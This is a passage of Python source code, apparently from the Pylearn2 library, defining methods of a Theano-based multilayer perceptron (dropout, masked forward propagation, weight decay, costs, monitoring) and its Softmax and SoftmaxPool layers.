assert not self._nested, "A nested MLP does not have a target source"
return self._target_source
def setup_rng(self):
"""
.. todo::
WRITEME
"""
assert not self._nested, "Nested MLPs should use their parent's RNG"
if self.seed is None:
self.seed = [2013, 1, 4]
self.rng = np.random.RandomState(self.seed)
@wraps(Layer.get_default_cost)
def get_default_cost(self):
return Default()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layers[-1].get_output_space()
@wraps(Layer.get_target_space)
def get_target_space(self):
return self.layers[-1].get_target_space()
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if hasattr(self, "mlp"):
#assert self._nested
self.input_space = self.mlp.input_space
self.rng = self.mlp.rng
self.batch_size = self.mlp.batch_size
else:
self.input_space = space
self._update_layer_input_spaces()
def _update_layer_input_spaces(self):
"""
Tells each layer what its input space should be.
Notes
-----
This usually resets the layer's parameters!
"""
layers = self.layers
try:
layers[0].set_input_space(self.get_input_space())
except BadInputSpaceError as e:
raise TypeError("Layer 0 (" + str(layers[0]) + " of type " +
str(type(layers[0])) +
") does not support the MLP's "
+ "specified input space (" +
str(self.get_input_space()) +
" of type " + str(type(self.get_input_space())) +
"). Original exception: " + str(e))
for i in xrange(1, len(layers)):
layers[i].set_input_space(layers[i - 1].get_output_space())
def add_layers(self, layers):
"""
Add new layers on top of the existing hidden layers
Parameters
----------
layers : WRITEME
"""
existing_layers = self.layers
assert len(existing_layers) > 0
for layer in layers:
assert layer.get_mlp() is None
layer.set_mlp(self)
# In the case of nested MLPs, input/output spaces may have not yet
# been initialized
if not self._nested or hasattr(self, 'input_space'):
layer.set_input_space(existing_layers[-1].get_output_space())
existing_layers.append(layer)
assert layer.layer_name not in self.layer_names
self.layer_names.add(layer.layer_name)
def freeze(self, parameter_set):
"""
Freezes some of the parameters (new theano functions that implement
learning will not use them; existing theano functions will continue
to modify them).
Parameters
----------
parameter_set : set
Set of parameters to freeze.
"""
self.freeze_set = self.freeze_set.union(parameter_set)
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
# if the MLP is the outer MLP \
# (ie MLP is not contained in another structure)
if self.monitor_targets:
X, Y = data
else:
X = data
Y = None
state = X
rval = self.get_layer_monitoring_channels(state_below=X,
targets=Y)
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
state = state_below
for layer in self.layers:
# We don't go through all the inner layers recursively
state_below = state
state = layer.fprop(state)
args = [state_below, state]
if layer is self.layers[-1] and targets is not None:
args.append(targets)
ch = layer.get_layer_monitoring_channels(*args)
if not isinstance(ch, OrderedDict):
raise TypeError(str((type(ch), layer.layer_name)))
for key in ch:
value = ch[key]
doc = get_monitor_doc(value)
if doc is None:
doc = str(type(layer)) + \
".get_monitoring_channels_from_state did" + \
" not provide any further documentation for" + \
" this channel."
if layer.layer_name is not None:
doc = 'This channel came from a layer called "' + \
layer.layer_name + '" of an MLP.\n' + doc
else:
doc = 'This channel came from a pickled layer' + \
' of an MLP.\n' + doc
layer.layer_name = "pickled_pretrained"
value.__doc__ = doc
rval[layer.layer_name + '_' + key] = value
return rval
def get_monitoring_data_specs(self):
"""
Returns data specs requiring both inputs and targets.
Returns
-------
data_specs: TODO
The data specifications for both inputs and targets.
"""
if not self.monitor_targets:
return (self.get_input_space(), self.get_input_source())
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
@wraps(Layer.get_params)
def get_params(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = []
for layer in self.layers:
for param in layer.get_params():
if param.name is None:
logger.info(type(layer))
layer_params = layer.get_params()
assert not isinstance(layer_params, set)
for param in layer_params:
if param not in rval:
rval.append(param)
rval = [elem for elem in rval if elem not in self.freeze_set]
assert all([elem.name is not None for elem in rval])
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_l1_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Model.set_batch_size)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
self.force_batch_size = batch_size
for layer in self.layers:
layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
@wraps(Layer.get_weights)
def get_weights(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights()
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_view_shape()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_format()
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_topo()
def dropout_fprop(self, state_below, default_input_include_prob=0.5,
input_include_probs=None, default_input_scale=2.,
input_scales=None, per_example=True):
"""
Returns the output of the MLP, when applying dropout to the input and
intermediate layers.
Parameters
----------
state_below : WRITEME
The input to the MLP
        default_input_include_prob : float, optional
            The probability of including a layer's input, used for layers
            whose names do not appear in `input_include_probs`.
        input_include_probs : dict, optional
            A dictionary mapping layer names to their input inclusion
            probabilities.
        default_input_scale : float, optional
            The amount by which to scale included inputs, used for layers
            whose names do not appear in `input_scales`.
        input_scales : dict, optional
            A dictionary mapping layer names to input scale factors.
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
Notes
-----
Each input to each layer is randomly included or
excluded for each example. The probability of inclusion is independent
for each input and each example. Each layer uses
`default_input_include_prob` unless that layer's name appears as a key
in input_include_probs, in which case the input inclusion probability
is given by the corresponding value.
        Each feature is also multiplied by a scale factor. The scale factor
        for each layer's input is determined by the same scheme as the input
        inclusion probabilities.
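        Examples
        --------
        >>> # Sketch: assumes `mlp` has a layer named 'h0' and `X` is a
        >>> # symbolic batch lying in mlp.get_input_space().
        >>> # out = mlp.dropout_fprop(X,
        >>> #                         default_input_include_prob=0.5,
        >>> #                         input_include_probs={'h0': 0.8},
        >>> #                         default_input_scale=2.)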
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self._validate_layer_names(list(input_include_probs.keys()))
self._validate_layer_names(list(input_scales.keys()))
theano_rng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
for layer in self.layers:
layer_name = layer.layer_name
if layer_name in input_include_probs:
include_prob = input_include_probs[layer_name]
else:
include_prob = default_input_include_prob
if layer_name in input_scales:
scale = input_scales[layer_name]
else:
scale = default_input_scale
state_below = self.apply_dropout(
state=state_below,
include_prob=include_prob,
theano_rng=theano_rng,
scale=scale,
mask_value=layer.dropout_input_mask_value,
input_space=layer.get_input_space(),
per_example=per_example
)
state_below = layer.fprop(state_below)
return state_below
def masked_fprop(self, state_below, mask, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Forward propagate through the network with a dropout mask
determined by an integer (the binary representation of
which is used to generate the mask).
Parameters
----------
state_below : tensor_like
The (symbolic) output state of the layer below.
mask : int
An integer indexing possible binary masks. It should be
< 2 ** get_total_input_dimension(masked_input_layers)
and greater than or equal to 0.
masked_input_layers : list, optional
A list of layer names to mask. If `None`, the input to all layers
(including the first hidden layer) is masked.
default_input_scale : float, optional
The amount to scale inputs in masked layers that do not appear in
`input_scales`. Defaults to 2.
input_scales : dict, optional
A dictionary mapping layer names to floating point numbers
indicating how much to scale input to a given layer.
Returns
-------
masked_output : tensor_like
The output of the forward propagation of the masked network.
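        Examples
        --------
        >>> # Sketch: drop a fixed binary pattern of inputs to a layer named
        >>> # 'h0' (the integer 5 encodes which inputs are kept).
        >>> # out = mlp.masked_fprop(X, mask=5, masked_input_layers=['h0'])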
"""
        if masked_input_layers is not None:
            self._validate_layer_names(masked_input_layers)
        else:
            masked_input_layers = self.layer_names
        if input_scales is not None:
            self._validate_layer_names(input_scales)
        else:
            input_scales = {}
        if any(n not in masked_input_layers for n in input_scales):
            layers = [n for n in input_scales if n not in masked_input_layers]
            raise ValueError("input scales provided for layer not masked: %s" %
                             ", ".join(layers))
num_inputs = self.get_total_input_dimension(masked_input_layers)
assert mask >= 0, "Mask must be a non-negative integer."
if mask > 0 and math.log(mask, 2) > num_inputs:
raise ValueError("mask value of %d too large; only %d "
"inputs to layers (%s)" %
(mask, num_inputs,
", ".join(masked_input_layers)))
def binary_string(x, length, dtype):
"""
Create the binary representation of an integer `x`, padded to
`length`, with dtype `dtype`.
Parameters
----------
length : WRITEME
dtype : WRITEME
Returns
-------
WRITEME
"""
s = np.empty(length, dtype=dtype)
for i in range(length - 1, -1, -1):
if x // (2 ** i) == 1:
s[i] = 1
else:
s[i] = 0
x = x % (2 ** i)
return s
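        # For example, binary_string(5, 4, 'uint8') -> array([1, 0, 1, 0]):
        # entry i of the result is bit i (least significant first) of x.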
remaining_mask = mask
for layer in self.layers:
if layer.layer_name in masked_input_layers:
scale = input_scales.get(layer.layer_name,
default_input_scale)
n_inputs = layer.get_input_space().get_total_dimension()
layer_dropout_mask = remaining_mask & (2 ** n_inputs - 1)
remaining_mask >>= n_inputs
mask = binary_string(layer_dropout_mask, n_inputs,
'uint8')
shape = layer.get_input_space().get_origin_batch(1).shape
s_mask = T.as_tensor_variable(mask).reshape(shape)
if layer.dropout_input_mask_value == 0:
state_below = state_below * s_mask * scale
else:
state_below = T.switch(s_mask, state_below * scale,
layer.dropout_input_mask_value)
state_below = layer.fprop(state_below)
return state_below
def _validate_layer_names(self, layers):
"""
.. todo::
WRITEME
"""
if any(layer not in self.layer_names for layer in layers):
unknown_names = [layer for layer in layers
if layer not in self.layer_names]
raise ValueError("MLP has no layer(s) named %s" %
", ".join(unknown_names))
def get_total_input_dimension(self, layers):
"""
Get the total number of inputs to the layers whose
names are listed in `layers`. Used for computing the
total number of dropout masks.
Parameters
----------
layers : WRITEME
Returns
-------
WRITEME
"""
self._validate_layer_names(layers)
total = 0
for layer in self.layers:
if layer.layer_name in layers:
total += layer.get_input_space().get_total_dimension()
return total
@wraps(Layer.fprop)
def fprop(self, state_below, return_all=False):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = self.layers[0].fprop(state_below)
rlist = [rval]
for layer in self.layers[1:]:
rval = layer.fprop(rval)
rlist.append(rval)
if return_all:
return rlist
return rval
def apply_dropout(self, state, include_prob, scale, theano_rng,
input_space, mask_value=0, per_example=True):
"""
.. todo::
WRITEME
Parameters
----------
state: WRITEME
include_prob : WRITEME
scale : WRITEME
theano_rng : WRITEME
input_space : WRITEME
mask_value : WRITEME
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
"""
if include_prob in [None, 1.0, 1]:
return state
assert scale is not None
if isinstance(state, tuple):
            return tuple(self.apply_dropout(substate, include_prob, scale,
                                            theano_rng, component, mask_value,
                                            per_example)
                         for substate, component in
                         safe_zip(state, input_space.components))
# TODO: all of this assumes that if it's not a tuple, it's
# a dense tensor. It hasn't been tested with sparse types.
# A method to format the mask (or any other values) as
# the given symbolic type should be added to the Spaces
# interface.
if per_example:
mask = theano_rng.binomial(p=include_prob, size=state.shape,
dtype=state.dtype)
else:
batch = input_space.get_origin_batch(1)
mask = theano_rng.binomial(p=include_prob, size=batch.shape,
dtype=state.dtype)
rebroadcast = T.Rebroadcast(*zip(xrange(batch.ndim),
[s == 1 for s in batch.shape]))
mask = rebroadcast(mask)
if mask_value == 0:
rval = state * mask * scale
else:
rval = T.switch(mask, state * scale, mask_value)
return T.cast(rval, state.dtype)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.layers[-1].cost(Y, Y_hat)
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
return self.layers[-1].cost_matrix(Y, Y_hat)
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return self.layers[-1].cost_from_cost_matrix(cost_matrix)
def cost_from_X(self, data):
"""
Computes self.cost, but takes data=(X, Y) rather than Y_hat as an
argument.
This is just a wrapper around self.cost that computes Y_hat by
calling Y_hat = self.fprop(X)
Parameters
----------
        data : tuple
            A (X, Y) pair of Theano variables, conforming to the specs
            returned by `cost_from_X_data_specs`.
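        Examples
        --------
        >>> # Sketch: X and Y are symbolic batches in the MLP's input and
        >>> # target spaces respectively.
        >>> # cost = mlp.cost_from_X((X, Y))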
"""
self.cost_from_X_data_specs()[0].validate(data)
X, Y = data
Y_hat = self.fprop(X)
return self.cost(Y, Y_hat)
def cost_from_X_data_specs(self):
"""
Returns the data specs needed by cost_from_X.
This is useful if cost_from_X is used in a MethodCost.
"""
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
def __str__(self):
"""
Summarizes the MLP by printing the size and format of the input to all
layers. Feel free to add reasonably concise info as needed.
"""
rval = []
for layer in self.layers:
rval.append(layer.layer_name)
input_space = layer.get_input_space()
rval.append('\tInput space: ' + str(input_space))
rval.append('\tTotal input dimension: ' +
str(input_space.get_total_dimension()))
rval = '\n'.join(rval)
return rval
class Softmax(Layer):
"""
A layer that can apply an optional affine transformation
to vectorial inputs followed by a softmax nonlinearity.
Parameters
----------
n_classes : int
Number of classes for softmax targets.
layer_name : string
Name of Softmax layers.
irange : float
If specified, initialized each weight randomly in
U(-irange, irange).
istdev : float
If specified, initialize each weight randomly from
N(0,istdev).
sparse_init : int
        If specified, initialize sparse_init weights per unit by
        drawing them from N(0, 1); the remaining weights are 0.
W_lr_scale : float
Scale for weight learning rate.
b_lr_scale : float
Scale for bias learning rate.
max_row_norm : float
Maximum norm for a row of the weight matrix.
no_affine : boolean
If True, softmax nonlinearity is applied directly to
inputs.
max_col_norm : float
Maximum norm for a column of the weight matrix.
init_bias_target_marginals : dataset
Take the probability distribution of the targets into account to
intelligently initialize biases.
binary_target_dim : int, optional
If your targets are class labels (i.e. a binary vector) then set the
number of targets here so that an IndexSpace of the proper dimension
can be used as the target space. This allows the softmax to compute
the cost much more quickly than if it needs to convert the targets
into a VectorSpace. With binary_target_dim>1, you can use one layer
to simultaneously predict a bag of words (i.e. order is not important,
the same element can be included more than once).
non_redundant : bool
If True, learns only n_classes - 1 biases and weight vectors
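    Examples
    --------
    >>> # Sketch of a 10-way output layer whose targets are integer class
    >>> # labels rather than one-hot vectors.
    >>> # y = Softmax(n_classes=10, layer_name='y', irange=0.05,
    >>> #             binary_target_dim=1)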
"""
def __init__(self, n_classes, layer_name, irange=None,
istdev=None,
sparse_init=None, W_lr_scale=None,
b_lr_scale=None, max_row_norm=None,
no_affine=False,
max_col_norm=None, init_bias_target_marginals=None,
binary_target_dim=None, non_redundant=False):
super(Softmax, self).__init__()
if max_col_norm is not None:
self.extensions.append(MaxL2FilterNorm(max_col_norm))
if non_redundant:
if init_bias_target_marginals:
msg = ("init_bias_target_marginals currently only works "
"with the overcomplete parameterization.")
raise NotImplementedError(msg)
if isinstance(W_lr_scale, str):
W_lr_scale = float(W_lr_scale)
self.__dict__.update(locals())
del self.self
del self.init_bias_target_marginals
if not isinstance(n_classes, py_integer_types):
raise TypeError("n_classes is of type %s, but must be integer" %
type(n_classes))
if binary_target_dim is not None:
assert isinstance(binary_target_dim, py_integer_types)
self._has_binary_target = True
self._target_space = IndexSpace(dim=binary_target_dim,
max_labels=n_classes)
else:
self._has_binary_target = False
self.output_space = VectorSpace(n_classes)
if not no_affine:
self.b = sharedX(np.zeros((n_classes - self.non_redundant,)),
name='softmax_b')
if init_bias_target_marginals:
y = init_bias_target_marginals.y
if init_bias_target_marginals.y_labels is None:
marginals = y.mean(axis=0)
else:
# compute class frequencies
if np.max(y.shape) != np.prod(y.shape):
raise AssertionError("Use of "
"`init_bias_target_marginals` "
"requires that each example has "
"a single label.")
marginals = np.bincount(y.flat) / float(y.shape[0])
assert marginals.ndim == 1
b = pseudoinverse_softmax_numpy(marginals).astype(self.b.dtype)
assert b.ndim == 1
assert b.dtype == self.b.dtype
self.b.set_value(b)
else:
assert init_bias_target_marginals is None
def __setstate__(self, state):
super(Softmax, self).__setstate__(state)
# Patch old pickle files
if not hasattr(self, 'non_redundant'):
self.non_redundant = False
if not hasattr(self, 'mask_weights'):
self.mask_weights = None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = OrderedDict()
if self.W_lr_scale is not None:
assert isinstance(self.W_lr_scale, float)
rval[self.W] = self.W_lr_scale
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
if self.b_lr_scale is not None:
assert isinstance(self.b_lr_scale, float)
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
if not self.no_affine:
W = self.W
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval.update(OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ]))
if (state_below is not None) or (state is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=1)
rval.update(OrderedDict([('mean_max_class', mx.mean()),
('max_max_class', mx.max()),
('min_max_class', mx.min())]))
if (targets is not None):
if ((not self._has_binary_target) or
self.binary_target_dim == 1):
# if binary_target_dim>1, the misclass rate is ill-defined
y_hat = T.argmax(state, axis=1)
y = (targets.reshape(y_hat.shape)
if self._has_binary_target
else T.argmax(targets, axis=1))
misclass = T.neq(y, y_hat).mean()
misclass = T.cast(misclass, config.floatX)
rval['misclass'] = misclass
rval['nll'] = self.cost(Y_hat=state, Y=targets)
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Space):
raise TypeError("Expected Space, got " +
str(space) + " of type " + str(type(space)))
self.input_dim = space.get_total_dimension()
self.needs_reformat = not isinstance(space, VectorSpace)
if self.no_affine:
desired_dim = self.n_classes - self.non_redundant
assert self.input_dim == desired_dim
else:
desired_dim = self.input_dim
self.desired_space = VectorSpace(desired_dim)
if not self.needs_reformat:
assert self.desired_space == self.input_space
rng = self.mlp.rng
if self.no_affine:
self._params = []
else:
num_cols = self.n_classes - self.non_redundant
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, num_cols))
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, num_cols) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, num_cols))
for i in xrange(num_cols):
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0.:
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
self.W = sharedX(W, 'softmax_W')
self._params = [self.b, self.W]
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
desired = self.W.get_value().T
ipt = self.desired_space.np_format_as(desired, self.input_space)
rval = Conv2DSpace.convert_numpy(ipt,
self.input_space.axes,
('b', 0, 1, 'c'))
return rval
@wraps(Layer.get_weights)
def get_weights(self):
if not isinstance(self.input_space, VectorSpace):
raise NotImplementedError()
return self.W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
self.W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.needs_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
self.desired_space.validate(state_below)
assert state_below.ndim == 2
if not hasattr(self, 'no_affine'):
self.no_affine = False
if self.no_affine:
Z = state_below
else:
assert self.W.ndim == 2
b = self.b
Z = T.dot(state_below, self.W) + b
if self.non_redundant:
zeros = T.alloc(0., Z.shape[0], 1)
Z = T.concatenate((zeros, Z), axis=1)
rval = T.nnet.softmax(Z)
for value in get_debug_values(rval):
if self.mlp.batch_size is not None:
assert value.shape[0] == self.mlp.batch_size
return rval
def _cost(self, Y, Y_hat):
z = arg_of_softmax(Y_hat)
assert z.ndim == 2
z = z - z.max(axis=1).dimshuffle(0, 'x')
log_prob = z - T.log(T.exp(z).sum(axis=1).dimshuffle(0, 'x'))
# we use sum and not mean because this is really one variable per row
if self._has_binary_target:
# The following code is the equivalent of accessing log_prob by the
# indices in Y, but it is written such that the computation can
# happen on the GPU rather than CPU.
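            # For example, with n_classes = 3 and Y = [[2], [0]], flat_indices
            # is [2 + 0 * 3, 0 + 1 * 3] = [2, 3]: the log probability of
            # class 2 for row 0 and of class 0 for row 1.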
flat_Y = Y.flatten()
flat_Y.name = 'flat_Y'
flat_log_prob = log_prob.flatten()
flat_log_prob.name = 'flat_log_prob'
range_ = T.arange(Y.shape[0])
if self.binary_target_dim > 1:
# because of an error in optimization (local_useless_tile)
# when tiling with (1, 1)
range_ = T.tile(range_.dimshuffle(0, 'x'),
(1, self.binary_target_dim)).flatten()
flat_indices = flat_Y + range_ * self.n_classes
flat_indices.name = 'flat_indices'
log_prob_of = flat_log_prob[flat_indices].reshape(Y.shape, ndim=2)
log_prob_of.name = 'log_prob_of'
else:
log_prob_of = (Y * log_prob)
return log_prob_of
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat).sum(axis=1)
assert log_prob_of.ndim == 1
rval = log_prob_of.mean()
return - rval
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat)
if self._has_binary_target:
flat_Y = Y.flatten()
flat_matrix = T.alloc(0, (Y.shape[0] * log_prob_of.shape[1]))
flat_indices = flat_Y + T.extra_ops.repeat(
T.arange(Y.shape[0]) * log_prob_of.shape[1], Y.shape[1]
)
log_prob_of = T.set_subtensor(flat_matrix[flat_indices], flat_Y)
return -log_prob_of
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
return coeff * T.sqr(self.W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W = self.W
return coeff * abs(W).sum()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.no_affine:
return
if self.max_row_norm is not None:
W = self.W
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
class SoftmaxPool(Layer):
"""
A hidden layer that uses the softmax function to do max pooling over groups
of units. When the pooling size is 1, this reduces to a standard sigmoidal
MLP layer.
Parameters
----------
detector_layer_dim : WRITEME
layer_name : WRITEME
pool_size : WRITEME
irange : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float, optional
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
init_bias : WRITEME
W_lr_scale : WRITEME
b_lr_scale : WRITEME
mask_weights : WRITEME
max_col_norm : WRITEME
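    Examples
    --------
    >>> # Sketch: 240 detector units pooled in groups of 4 give 60 outputs.
    >>> # h0 = SoftmaxPool(detector_layer_dim=240, pool_size=4,
    >>> #                  layer_name='h0', irange=0.05)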
"""
def __init__(self,
detector_layer_dim,
layer_name,
pool_size=1,
irange=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_col_norm=None):
super(SoftmaxPool, self).__init__()
self.__dict__.update(locals())
del self.self
self.b = sharedX(np.zeros((self.detector_layer_dim,)) + init_bias,
name=(layer_name + '_b'))
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
if not (self.detector_layer_dim % self.pool_size == 0):
raise ValueError("detector_layer_dim = %d, pool_size = %d. "
"Should be divisible but remainder is %d" %
(self.detector_layer_dim,
self.pool_size,
self.detector_layer_dim % self.pool_size))
self.h_space = VectorSpace(self.detector_layer_dim)
self.pool_layer_dim = self.detector_layer_dim / self.pool_size
self.output_space = VectorSpace(self.pool_layer_dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.detector_layer_dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.detector_layer_dim))
< self.include_prob)
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.detector_layer_dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.detector_layer_dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.detector_layer_dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) +
" but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_col_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
desired_norms = T.clip(col_norms, 0, self.max_col_norm)
updates[W] = updated_W * (desired_norms / (1e-7 + col_norms))
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
return W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
"""
.. todo::
WRITEME
"""
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
total = self.detector_layer_dim
cols = self.pool_size
if cols == 1:
# Let the PatchViewer decide how to arrange the units
# when they're not pooled
raise NotImplementedError()
# When they are pooled, make each pooling unit have one row
rows = total / cols
return rows, cols
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.detector_layer_dim,
self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, **kwargs):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
